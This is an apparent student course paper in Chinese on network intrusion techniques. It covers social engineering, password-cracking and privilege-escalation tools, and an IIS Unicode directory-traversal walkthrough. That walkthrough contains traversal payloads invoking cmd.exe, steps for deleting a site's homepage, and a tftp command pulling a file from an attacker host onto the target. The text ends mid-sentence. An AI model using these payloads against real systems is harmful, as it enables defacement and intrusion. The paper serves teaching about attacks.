网络入侵手段与网络入侵技术论文

哈尔滨远东理工学院网络入侵手段与网络入侵技术姓名：崔冬伟专业：13级计算机网络技术学号：13520104-1-一、前言目前，随着我国信息化进程的不断加快，计算机万回落已经广泛应用与政治、办公、经济、文化及社会生活的方方面面，网上办公，远程教育等技术手段早已成为现实。正如任何新鲜事物都有正反两方面一样。计算机网络在推动整个社会发展的同时也带来了计算机网络安全问题，例如入侵和病毒等。其实入侵给计算机网络带来的是目的性更强的破坏。目前仅仅在互联网上就有20多万个黑客网站。这些站点都介绍了一些攻击方法和攻击软件的使用以及系统的一些漏洞。每天都有一大批新的黑客产生，除了好奇的少年网民，还有别有居心的人。但现在还缺乏针对网络犯罪卓有成效的反击和跟踪手段，黑客攻击很隐蔽，使系统遭受攻击的可能性变大了，这成为网络安全的主要威胁。二、常用的网络攻击手段：1.社会工程学攻击2.物理攻击3.暴力攻击4.利用Unicode漏洞攻击5.利用缓冲区溢出漏洞进行攻击等技术三、网络攻击手段实现以及流行的攻击工具的使用以及部分工具的代码实现。1.社会工程学攻击社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。目前社会工程学攻击主要包括两种方式：打电话请求密码和伪造Email(1)打电话请求密码尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通过这种简单的方法重新获得密码。(2)伪造Email-2-使用telnet一个黑客可以截取任何一个身份证发送Email的全部信息，这样的Email消息是真的，因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息，黑客就能实施他们的恶意阴谋。2.物理攻击(1)得到管理员密码用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，可以利用程序将当前登录用户的密码解码出来，使用FindPass等工具可以对该进程进行解码，然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录，执行该程序，将得到当前用户得登录名，(2)权限提升-3-有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。其实不然，用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。(3)普通用户建立管理员帐号利用Hacker帐户登录系统，在系统中执行程序GetAdmin.exe，程序自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名，输入一个用户名“IAMHacker”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口，3.暴力攻击暴力攻击的一个具体例子是，一个黑客试图使用计算机和信息去破解一个密码。一个黑客需要破解—段单一的被用非对称密钥加密的信息，为了破解这种算法，一个黑客需要求助于非常精密复杂的方法，它使用120个工作站，两个超级计算机利用从三个主要的研究中心获得的信息，即使拥有这种配备，它也将花掉八天的时间去破解加密算法，实际上破解加密过程八天已是非常短暂的时间了。-4-(1)字典文件一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机，可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的提高破解效率。一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件，图5-8是一个简单的字典文件。(2)暴力破解操作系统密码字典文件为暴力破解提供了一条捷径，程序首先通过扫描得到系统的用户，然后利用字典中每一个密码来登录系统，看是否成功，如果成功则将密码显示(3)暴力破解操作系统密码比如使用下图所示的字典文件，利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来，(4)暴力破解邮箱密码邮箱的密码一般需要设置到八位以上，否则七位以下的密码容易被破解。尤其七位全部是数字，更容易被破解。破解电子邮箱密码，一个比较著名的工具软件是：黑雨——POP3邮箱密码暴力破解-5-器，比较稳定的版本是2.3.1，(5)暴力破解软件密码目前许多软件都具有加密的功能，比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解。①Office文档暴力破解②修改权限密码对话框中选择选项卡“安全性”，在打开权限密码和修改权限密码的两个文本框中都输入“999”，-6-保存并关闭该文档，然后再打开，就需要输入密码了③破解Word文档密码密码是三位的，使用工具软件，AdvancedOfficeXPPasswordRecovery可以快速破解Word文档密码，主界面如图-7-点击工具栏按钮“OpenFile”，打开刚才建立的Word文档，程序打开成功后会在LogWindow中显示成功打开的消息设置密码长度最短是一位，最长是三位，点击工具栏开始的图标，开始破解密码，大约两秒钟后，密码被破解了4.Unicode漏洞专题通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发布的，受影响的版本：MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。-8-微软IIS4.0和5.0都存在利用扩展UNICODE字符取代/和\而能利用../目录遍历的漏洞。使用扫描工具来检测Unicode漏洞是否存在，使用上一章介绍的X-Scan来对目标系统进行扫描，目标主机IP为：172.18.25.109，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置如下图将主机添加到目标地址，扫描结果如下图可以看出，存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如：/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录，在IIS中的位置如下图-9-scripts目录一般系统盘根目录下的Inetpub目录下，如图在Windows的目录结构中，可以使用两个点和一个斜线“../”来访问上一级目录，在浏览器中利用“scripts/../../”可以访问到系统盘根目录，访问“scripts/../../winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。浏览器地址栏中禁用符号“../”，但是可以使用符号“/”的Unicode的编码。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。%c1%pc%c0%9v-10-%c0%qf%c1%8s%e0%80%af利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入“:\”(1)利用Unicode漏洞读取系统盘目录利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。使用的语句是：:\boot.ini执行的结果如图(2)利用Unicode漏洞删除主页利用Unicode可以方便的更改对方的主页，比如现在已经知道对方网站的根路径在-11-“C:\Initpub\”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。使用的语句是：:\inetpub\(3)拷贝文件为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是：:\winnt\system32\cmd.exe+c.exe程序执行结果如图(4)查看C盘的目录以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：-12-:\执行的结果如图(5)利用Unicode漏洞入侵系统在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件，入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（TextFileTransmissionProtocol）一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序，主界面如图-13-这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令：“”命令其实是“tftp–i172.18.25.110getidq.dll”意思是从172.18.25.110服务器上获取idq.dll文件，执行成功的界面如图(6)上载文件(7)查看scripts目录传完毕后可以查看一下scripts目录，是否真的上传成功了。如图(8)入侵对方主机说明已经成功的在script